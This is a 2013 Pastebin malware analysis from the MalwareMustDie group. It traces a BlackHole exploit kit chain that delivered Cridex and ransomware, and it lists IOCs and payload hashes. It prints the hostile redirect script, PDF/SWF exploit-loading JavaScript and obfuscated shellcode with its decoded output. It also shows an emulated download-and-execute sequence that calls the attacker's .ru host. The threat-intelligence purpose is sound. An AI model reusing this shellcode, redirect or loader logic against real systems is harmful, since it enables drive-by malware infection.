Advertisement
MalwareMustDie

#MalwareMustDie - ejjiipprr,ru : GeoIP Cridex + Ransomware

Feb 20th, 2013
1,617
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.20 KB | None | 0 0
  1. =========================================================
  2. Title: #MalwareMustDie - ejjiipprr,ru : GeoIP Cridex + Ransomware
  3. #MalwareMustDie! @unixfreaxjp /malware]$ date
  4. Tue Feb 19 15:26:25 JST 2013
  5.  
  6. BlackHole Exploit Kit with Double infector:
  7. Cridex & FakeAV/Ransomer (depends on your request IP)
  8. Landing page: h00p://ejjiipprr,ru:8080/forum/links/public_version,php
  9. IP: 195・210・47・208, 50・31・1・104, 66・249・23・64
  10. payloads:
  11. 2013/02/19 14:07 ff74196d1aacd629ee7af6955c837a24 94,208 readme・exe (cridex)
  12. 2013/02/19 14:06 c182dfc3418573d61fdc7dcc11eb319d 114,688 info・exe (ransomer)
  13. Landing page's PLuginDetect:
  14. 1: http://pastebin.com/mCJy7GEn
  15. 2: http://pastebin.com/LSUCnvN6
  16. =========================================================
  17.  
  18. //---------changes detected in today's infector・・・
  19.  
  20. @unixfreaxjp /malware]$ date
  21. Tue Feb 19 14:17:40 JST 2013
  22. @unixfreaxjp /malware]$ curl hxxp://webworks・investorship・co・jp/page-329・htm
  23. <html>
  24. <head>
  25. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  26. <title>Please wait</title>
  27. </head>
  28. <body>
  29. <h1><b>Please wait a moment ・・・ You will be forwarded・・・ </h1></b>
  30. <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
  31.  
  32.  
  33. <script>
  34. var1=49;
  35. var2=var1;
  36. if(var1==var2) {document・location="hxxp://ejjiipprr,ru:8080/forum/links/public_version,php";}
  37. </script>
  38.  
  39.  
  40. </body>
  41.  
  42. @unixfreaxjp /malware]$ myget --head -O/dev/null -d hxxp://webworks・investorship・co・jp/page-329・htm
  43. DEBUG output freebsd9・1・
  44. HTTP/1・1 200 OK
  45. Date: Tue, 19 Feb 2013 05:17:54 GMT
  46. Server: Apache
  47. Last-Modified: Tue, 19 Feb 2013 05:06:13 GMT <======
  48.  
  49. //-----------------download--------
  50.  
  51. --12:56:52-- h00p://webworks・investorship・co・jp/page-329・htm
  52. => `page-329・htm'
  53. Resolving webworks・investorship・co・jp・・・ seconds 0・00, 117・20・100・110
  54. Caching webworks・investorship・co・jp => 117・20・100・110
  55. Connecting to webworks・investorship・co・jp|117・20・100・110|:80・・・ seconds 0・00, connected・
  56. GET /page-329・htm HTTP/1・0
  57. Host: webworks・investorship・co・jp
  58. HTTP request sent, awaiting response・・・
  59. HTTP/1・1 200 OK
  60. Date: Tue, 19 Feb 2013 03:56:44 GMT
  61. Server: Apache
  62. Last-Modified: Tue, 19 Feb 2013 03:42:14 GMT
  63. ETag: "11850611-1b1-5122f496"
  64. Accept-Ranges: bytes
  65. Content-Length: 433
  66. Connection: close
  67. Content-Type: text/html
  68. 200 OK
  69. Length: 433 [text/html]
  70. 12:56:52 (4・99 MB/s) - `page-329・htm' saved [433/433]
  71.  
  72. //----------------cat-------------------
  73.  
  74. $ cat page-329・htm
  75. <html>
  76. <head>
  77. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  78. <title>Please wait</title>
  79. </head>
  80. <body>
  81. <h1><b>Please wait a moment ・・・ You will be forwarded・・・ </h1></b>
  82. <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
  83.  
  84. <script>
  85. var1=49;
  86. var2=var1;
  87. if(var1==var2) {document・location="h00p://ejjiipprr,ru:8080/forum/links/public_version,php";}
  88. </script>
  89.  
  90. //------------- get the landing page----------------
  91.  
  92. // cant connect directly, got 502, looks I got blocked by these moronz now・・
  93.  
  94. --13:02:20-- h00p://ejjiipprr,ru:8080/forum/links/public_version,php
  95. => `public_version,php・1'
  96. Resolving ejjiipprr,ru・・・ seconds 0・00, 195・210・47・208, 50・31・1・104, 66・249・23・64
  97. Caching ejjiipprr,ru => 195・210・47・208 50・31・1・104 66・249・23・64
  98. Connecting to ejjiipprr,ru|195・210・47・208|:8080・・・ seconds 0・00, connected・
  99. HTTP/1・1 502 Bad Gateway
  100. Server: nginx/1・0・10
  101. Date: Tue, 19 Feb 2013 04:02:13 GMT
  102. Content-Type: text/html; charset=CP-1251
  103. Connection: keep-alive
  104. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  105. Vary: Accept-Encoding
  106. Content-Length: 0
  107.  
  108.  
  109. // retried・・・・・(bouncer)
  110.  
  111. --13:00:55-- h00p://ejjiipprr,ru:8080/forum/links/public_version,php
  112. => `public_version,php'
  113. Connecting to myproxy:myport・・・ seconds 0・00, connected・
  114. GET h00p://ejjiipprr,ru:8080/forum/links/public_version,php HTTP/1・0
  115. Referer: h00p://malwaremustdie・org
  116. Host: ejjiipprr,ru:8080
  117. Connection: keep-alive
  118. Proxy request sent, awaiting response・・・
  119. HTTP/1・1 200 OK
  120. Server: nginx/1・0・10
  121. Date: Tue, 19 Feb 2013 04:00:59 GMT
  122. Content-Type: text/html; charset=CP-1251
  123. Connection: close
  124. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  125. Vary: Accept-Encoding
  126. 200 OK
  127. Length: unspecified [text/html]
  128. 13:01:09 (120・01 KB/s) - `public_version,php' saved [156929] <=== take one・・・
  129.  
  130.  
  131. // retried・・・(gatling IP gunz・・)
  132.  
  133.  
  134. --13:05:53-- h00p://ejjiipprr,ru:8080/forum/links/public_version,php
  135. => `public_version,php'
  136. Resolving ejjiipprr,ru・・・ 66・249・23・64, 50・31・1・104, 195・210・47・208
  137. Caching ejjiipprr,ru => 66・249・23・64 50・31・1・104 195・210・47・208
  138. Connecting to ejjiipprr,ru|66・249・23・64|:8080・・・ connected・
  139. GET /forum/links/public_version,php HTTP/1・0
  140. Host: ejjiipprr,ru:8080
  141. HTTP request sent, awaiting response・・・
  142. HTTP/1・1 200 OK
  143. Server: nginx/1・0・10
  144. Date: Tue, 19 Feb 2013 04:05:55 GMT
  145. Content-Type: text/html; charset=CP-1251
  146. Connection: close
  147. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  148. Vary: Accept-Encoding
  149. 200 OK
  150. Length: unspecified [text/html]
  151. 13:05:56 (53・84 KB/s) - `public_version,php' saved [36665]
  152.  
  153.  
  154. //--------two landing page(S)------
  155.  
  156. 2013/02/19 13:17 cdb228f7ee3a261d4f3a5d4b723c085a 57,675 public_version-2,php
  157. 2013/02/19 13:01 f607dcc1b5a95a284238741f886940ac 56,929 public_version,php
  158.  
  159. //------1st plugin detect・・・・・
  160.  
  161.  
  162. // PDFs・・・・
  163.  
  164.  
  165. function p1(){
  166. var d = document・createElement("object");
  167. d・setAttribute("data", "/forum/links/public_version,php?edayjh=" + x("de300") + "&mnnq="
  168. + x("lju") + "&tagwmov=1j:33:32:1l:1g:1i:1o:1n:1o:1i&xllpos=" + x(pdfver・join("・")));
  169. d・setAttribute("type", "application/pdf");
  170. document・body・appendChild(d);
  171. }
  172. function p2(){
  173. var d = document・createElement("object");
  174. d・setAttribute("data", "/forum/links/public_version,php?lwgbb=" + x("de300") +
  175. "&lgltly=" + x("r") + "&mlqi=1j:33:32:1l:1g:1i:1o:1n:1o:1i&eshngcjb=" + x(pdfver・join(
  176. "・")));
  177. d・setAttribute("type", "application/pdf");
  178. document・body・appendChild(d);
  179. }
  180.  
  181. // SWF
  182.  
  183. function getCN(){
  184. return "/forum/links/public_version,php?zivqqsfs=" + x("de300") + "&ljpfu=" + x("hsosw")
  185. + "&ddpp=1j:33:32:1l:1g:1i:1o:1n:1o:1i&benbw=lvkkbwv"
  186. }
  187.  
  188. function ff2(){
  189. var oSpan = document・createElement("span");
  190. var url = "/forum/links/public_version,php?bbbiywar=" + x("de300") + "&wisduk=" + x(
  191. "toiu") + "&dej=1j:33:32:1l:1g:1i:1o:1n:1o:1i&mkej=fvgwpin";
  192. oSpan・innerHTML = "
  193. <object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id
  194. '><param name='movie' value='" + url + "
  195. ' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed
  196. src='" + url + "
  197. ' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash
  198. ' width='10' height='10'></embed></object>";
  199. document・body・appendChild(oSpan);
  200. }
  201.  
  202. // shellcode
  203.  
  204.  
  205. function getshellcode(){
  206. var a = "828・・1414!%"
  207. ・split("")・reverse()・join("");
  208. return a["replace"](/\%!/g, "%" + "u")
  209. }
  210.  
  211.  
  212. //------ second plugin detect・・・
  213.  
  214.  
  215. // PDFs・・・・(none!)
  216.  
  217. function p1(){
  218. return false;
  219. }
  220. function p2(){
  221. return false;
  222. }
  223. function p3(){
  224. return false;
  225. }
  226.  
  227. // SWF・・・・
  228.  
  229. function getCN(){
  230. return "/forum/links/public_version,php?dxfcb=" + x("50f08") + "&arfxjm=" + x("qfsnn") +
  231. "&sxclfr=2v:1k:1m:32:33:1k:1k:31:1j:1o&gakchxt=hxekxtdj"
  232. }
  233.  
  234. function ff2(){
  235. var oSpan = document・createElement("span");
  236. var url = "/forum/links/public_version,php?cmfzmg=" + x("50f08") + "&zvdjvx=" + x("pixr"
  237. ) + "&pxbu=2v:1k:1m:32:33:1k:1k:31:1j:1o&bmobk=jmb";
  238. oSpan・innerHTML = "
  239. <object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id
  240. '><param name='movie' value='" + url + "
  241. ' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed
  242. src='" + url + "
  243. ' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash
  244. ' width='10' height='10'></embed></object>";
  245. document・body・appendChild(oSpan);
  246. }
  247.  
  248. // shellcode・・・・
  249.  
  250. function getshellcode(){
  251. var a = "8282・・%1414!%"
  252. ・split("")・reverse()・join("");
  253. return a["replace"](/\%!/g, "%" + "u")
  254. }
  255.  
  256. //-------------------cracks engine・・・・
  257.  
  258.  
  259. // let's skip the infector this time・・ we must check whether they changed the
  260. // malware payloads or not・・
  261. //
  262. // ========================================
  263. // get the deobs + crack both shellcodes:
  264. // ========================================
  265.  
  266.  
  267. var shellcode1="8282!%51a4!%14d5!%O4eO・・
  268. eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d・・
  269. !%b1a1!%e5a5!%cOc2!%fec6!%f4b5!%a5d4!%・・
  270. 36!%e43a!%b25f!%67cO!%673a!%d5ec!%3173・・
  271. O185!%cfbe!%4ecf!%6638!%1414!%1414!%";
  272.  
  273. var shellcode2="8282!%51f4!%34d5!%54eO・・
  274. eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d・・
  275. !%b1a1!%e5a5!%cOc2!%fec6!%f4b5!%a5d4!%・・
  276. 36!%e43a!%b25f!%67cO!%673a!%d5ec!%3173・・
  277. O185!%cfbe!%4ecf!%6638!%1414!%1414!%";
  278.  
  279.  
  280. var a = shellcode1・split("")・reverse()・join("");
  281. var xxx= a["replace"](/\%!/g, "%" + "u");
  282. document・write(xxx);
  283.  
  284. var b = shellcode2・split("")・reverse()・join("");
  285. var yyy= b["replace"](/\%!/g, "%" + "u");
  286. document・write("\n\n"+yyy);
  287.  
  288. //Output:
  289.  
  290. %u4141%u4141%u8366%ufce4%uebfc%u581O%uc93・・
  291. 13%uce5d%ua376%uOc76%uf52b%ua34e%u6324%u6・・
  292. 4d5a%u5b4f%u6cef%u2cOc%u5a5e%u1a1b%u6cef%・・
  293. %ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e5・・
  294. 4O%u5d41%u4a15%u2828
  295.  
  296. %u4141%u4141%u8366%ufce4%uebfc%u581O%uc93・・
  297. 13%uce5d%ua376%uOc76%uf52b%ua34e%u6324%u6・・
  298. 4d5a%u5b4f%u6cef%u2cOc%u5a5e%u1a1b%u6cef%・・
  299. %ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e5・・
  300. 45%u5d43%u4f15%u2828
  301.  
  302. // let's mix the shellcodes now ;-))) experimental!
  303.  
  304. %u4141 % u4141 % u8366 % ufce4 % uebfc % u581O・・
  305. u68a3 % ua324 % u3458 % ua37e % u2O5e % uf31b ・・
  306. u64c3 % u7e79 % u5da3 % ua314 % u1d5c % u2b5O ・・
  307. u3713 % uce5d % ua376 % uOc76 % uf52b % ua34e ・・
  308. u2b5c % uc3be % ua3db % u2O4O % udfa3 % u2d42 ・・
  309. uab38 % u2deb % ucbd7 % u474O % u2846 % u4O28 ・・
  310. uOc2c % u4d5a % u5b4f % u6cef % u2cOc % u5a5e ・・
  311. u6cef % u2d35 % u4cO6 % u4444 % u6cee % u2135 ・・
  312. u422c % uab28 % u24c3 % ud77b % u2c7e % uebab ・・
  313. ubOc4 % ua2d6 % ua126 % u2947 % u1b95 % ua2e2 ・・
  314. uO718 % u474e % u5d5a % uO745 % u4144 % u4346 ・・
  315. u1912 % u124e % u4e19 % u41Oe % u154d % u4219 ・・
  316. u5OOe % u155d % uOe4O % u5d41 % u4a15 % u2828 ・・
  317. uccad % u1c5d % u77c1 % ue81b % ua34c % u1868 ・・
  318. u2e11 % ud35d % u1caf % uadOc % u5dcc % uc179 ・・
  319. uda1O % u2O5c % ue3e9 % u2b25 % u68f2 % ud9c3 ・・
  320. ueb71 % u7bc3 % ua385 % uO84O % u55a8 % u1b24 ・・
  321. u2828 % uab78 % u31e8 % u7d78 % uc4a3 % u76a3 ・・
  322. ua95a % u2cc4 % u2829 % ua528 % uOc74 % uef24 ・・
  323. u1bcO % u79e1 % u6cef % u2835 % u585f % u5c4a ・・
  324. u7ed7 % uad3c % u5de8 % u423e % u7b28 % u7ed7 ・・
  325. ud7d6 % u2O7e % ub4cO % ud7d6 % ua6d7 % u2666 ・・
  326. u5841 % u5a58 % uO65a % u5d5a % u1O12 % u1O18 ・・
  327. u5O17 % u154e % u4319 % u1912 % u124e % u1b1b ・・
  328. u1219 % u4219 % u1912 % uOe47 % u154e % u4319 ・・
  329.  
  330. // I doubt there will be ascii url so・・・
  331. // compile it・・・ get the objects, disasm it and match it with the windows API, see this double scheme works or not・・・
  332.  
  333. 0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  334. 0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
  335. 0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  336. 0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://ejjiipprr,ru:8080/forum/links/public_version,php?xf=1k:1f:33:1f:1n&ne=2v:1k:1m:32:33:1k:1k:31:1j:1o&f=1k&df=m&ku=g, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
  337. 0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  338. 0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  339. 0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
  340. 0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  341. 0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
  342. 0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  343. 0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://ejjiipprr,ru:8080/forum/links/public_version,php?kf=31:32:1i:1f:1f&ie=1j:33:32:1l:1g:1i:1o:1n:1o:1i&l=1k&xu=h&iu=b, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
  344. 0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  345. 0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  346. 0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
  347.  
  348. // it works :-)) good!
  349.  
  350. // fetch the mess・・・
  351.  
  352. --14:07:23-- h00p://ejjiipprr,ru:8080/forum/links/public_version,php?xf=1k:1f:33:1f:1n&ne=2v:1k:1m:32:33:1k:1k:31:1j:1o&f=1k&df=m&ku=g
  353. => `public_version,php@xf=1k%3A1f%3A33%3A1f%3A1n&ne=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&f=1k&df=m&ku=g'
  354. Resolving ejjiipprr,ru・・・ seconds 0・00, 50・31・1・104, 66・249・23・64, 195・210・47・208
  355. Caching ejjiipprr,ru => 50・31・1・104 66・249・23・64 195・210・47・208
  356. Connecting to ejjiipprr,ru|50・31・1・104|:8080・・・ seconds 0・00, connected・
  357. GET /forum/links/public_version,php?xf=1k:1f:33:1f:1n&ne=2v:1k:1m:32:33:1k:1k:31:1j:1o&f=1k&df=m&ku=g HTTP/1・0
  358. Referer: h00p://malwaremustdie・org
  359. User-Agent: #Smash greedy malware moronz!
  360. Host: ejjiipprr,ru:8080
  361. HTTP request sent, awaiting response・・・
  362. HTTP/1・1 200 OK
  363. Server: nginx/1・0・10
  364. Date: Tue, 19 Feb 2013 05:07:16 GMT
  365. Content-Type: application/x-msdownload
  366. Connection: keep-alive
  367. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  368. Pragma: public
  369. Expires: Tue, 19 Feb 2013 05:07:16 GMT
  370. Cache-Control: must-revalidate, post-check=0, pre-check=0
  371. Cache-Control: private
  372. Content-Disposition: attachment; filename="readme・exe"
  373. Content-Transfer-Encoding: binary
  374. Content-Length: 94208
  375. 200 OK
  376. Length: 94,208 (92K) [application/x-msdownload]
  377. 100%[====================================>] 94,208 98・81K/s
  378. 14:07:25 (98・48 KB/s) - `public_version,php@xf=1k%3A1f%3A33%3A1f%3A1n&ne=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&f=1k&df=m&ku=g' saved [94208/94208]
  379. GET /forum/links/public_version,php?kf=31:32:1i:1f:1f&ie=1j:33:32:1l:1g:1i:1o:1n:1o:1i&l=1k&xu=h&iu=b HTTP/1・0
  380. Referer: h00p://malwaremustdie・org
  381. User-Agent: #Smash greedy malware moronz!
  382. Host: ejjiipprr,ru:8080
  383. HTTP request sent, awaiting response・・・
  384. HTTP/1・1 200 OK
  385. Server: nginx/1・0・10
  386. Date: Tue, 19 Feb 2013 05:06:40 GMT
  387. Content-Type: application/x-msdownload
  388. Connection: keep-alive
  389. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  390. Pragma: public
  391. Expires: Tue, 19 Feb 2013 05:06:40 GMT
  392. Cache-Control: must-revalidate, post-check=0, pre-check=0
  393. Cache-Control: private
  394. Content-Disposition: attachment; filename="info・exe"
  395. Content-Transfer-Encoding: binary
  396. Content-Length: 114688
  397. 200 OK
  398. Length: 114,688 (112K) [application/x-msdownload]
  399. 100%[====================================>] 114,688 107・17K/s
  400. 14:06:50 (106・95 KB/s) - `public_version,php@kf=31%3A32%3A1i%3A1f%3A1f&ie=1j%3A33%3A32%3A1l%3A1g%3A1i%3A1o%3A1n%3A1o%3A1i&l=1k&xu=h&iu=b' saved [114688/114688]
  401.  
  402.  
  403. // samples evidence・・・
  404.  
  405. info・exe c182dfc3418573d61fdc7dcc11eb319d
  406. readme・exe ff74196d1aacd629ee7af6955c837a24
  407.  
  408. // you can see the snapshot of downloaded binary here・・・
  409. // the smaller size is Cridex and the Bigger size is Ransomer/FakeAlert
  410.  
  411. http://urlquery・net/report・php?id=1039316
  412. http://urlquery・net/report・php?id=1039314
  413.  
  414. // or the VT checks here・・・
  415.  
  416. https://www・virustotal・com/en/file/3cb0a852b902c1beffa70e6405825dfe71ad28141f8bcc369880af9f7e692b84/analysis/1361252424/
  417. https://www・virustotal・com/en/file/6cd8ae852bd023982b292a714d3e1582537606cc655a74c1fef152742c215e00/analysis/1361252413/
  418.  
  419. // and anubis for your conveniences:
  420.  
  421. http://anubis・iseclab・org/?action=result&task_id=1ab45db359838bee4dd1cfc29c34675ef
  422. http://anubis・iseclab・org/?action=result&task_id=148f40a21af53f524693c43eb52b6da6e
  423.  
  424.  
  425.  
  426. // ================================
  427. // NETWORK ANALYSIS
  428. //==================================
  429.  
  430.  
  431. // IP:
  432.  
  433. ejjiipprr,ru:8080 46,175,224,21 - 195,210,47,208 - 50,31,1,104 - 66,249,23,64
  434.  
  435. A 195・210・47・208, 50・31・1・104, 66・249・23・64
  436.  
  437.  
  438. // SOA:
  439.  
  440. primary name server = ns1・ejjiipprr,ru
  441. responsible mail addr = root・ejjiipprr,ru
  442. serial = 2012010101
  443. refresh = 604800 (7 days)
  444. retry = 1800 (30 mins)
  445. expire = 1800 (30 mins)
  446. default TTL = 60 (1 min)
  447.  
  448. // evil ns lists:
  449.  
  450. ns1・ejjiipprr,ru・ 1038 IN A 41・168・5・140
  451. ns2・ejjiipprr,ru・ 1038 IN A 110・164・58・250
  452. ns3・ejjiipprr,ru・ 1038 IN A 210・71・250・131
  453. ns4・ejjiipprr,ru・ 1038 IN A 203・171・234・53
  454. ns5・ejjiipprr,ru・ 60 IN A 110・164・58・250
  455. ns6・ejjiipprr,ru・ 60 IN A 41・168・5・140
  456.  
  457. // Whois:
  458. domain: EJJIIPPRR,ru
  459. nserver: ns1・ejjiipprr,ru・ 41・168・5・140
  460. nserver: ns2・ejjiipprr,ru・ 110・164・58・250
  461. nserver: ns3・ejjiipprr,ru・ 210・71・250・131
  462. nserver: ns4・ejjiipprr,ru・ 203・171・234・53
  463. state: REGISTERED, DELEGATED, UNVERIFIED
  464. person: Private Person
  465. registrar: NAUNET-REG-RIPN
  466. admin-contact: https://client・naunet,ru/c/whoiscontact
  467. created: 2013・02・11
  468. paid-till: 2014・02・11
  469. free-date: 2014・03・14
  470. source: TCI
  471.  
  472. // Recent current malware moronz group used domains (historical records)
  473. // to be used as reference:
  474.  
  475. emaianem,ru A 66・249・23・64
  476.  
  477. enakinukia,ru A 46・175・224・21
  478. exibonapa,ru A 46・175・224・21
  479. esigbsoahd,ru A 46・175・224・21
  480. egihurinak,ru A 46・175・224・21
  481. exiansik,ru A 46・175・224・21
  482. emaianem,ru A 46・175・224・21
  483. estipaindo,ru A 46・175・224・21
  484. epilarikko,ru A 46・175・224・21
  485. emalenoko,ru A 46・175・224・21
  486. eminakotpr,ru A 46・175・224・2
  487.  
  488. enakinukia,ru A 195・210・47・208
  489. exibonapa,ru A 195・210・47・208
  490. esigbsoahd,ru A 195・210・47・208
  491. epianokif,ru A 195・210・47・208
  492. elistof,ru A 195・210・47・208
  493. egihurinak,ru A 195・210・47・208
  494. exiansik,ru A 195・210・47・208
  495. ewinhdutik,ru A 195・210・47・208
  496. efjjdopkam,ru A 195・210・47・208
  497. eipuonam,ru A 195・210・47・208
  498. emaianem,ru A 195・210・47・208
  499. epionkalom,ru A 195・210・47・208
  500. estipaindo,ru A 195・210・47・208
  501. ejiposhhgio,ru A 195・210・47・208
  502. epilarikko,ru A 195・210・47・208
  503. emalenoko,ru A 195・210・47・208
  504. eminakotpr,ru A 195・210・47・208
  505.  
  506.  
  507. // all are using same evil dns :
  508.  
  509. 41・168・5・140
  510. 110・164・58・250
  511. 210・71・250・131
  512. 203・171・234・53
  513. 110・164・58・250
  514. 41・168・5・140
  515.  
  516.  
  517. ------
  518. #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement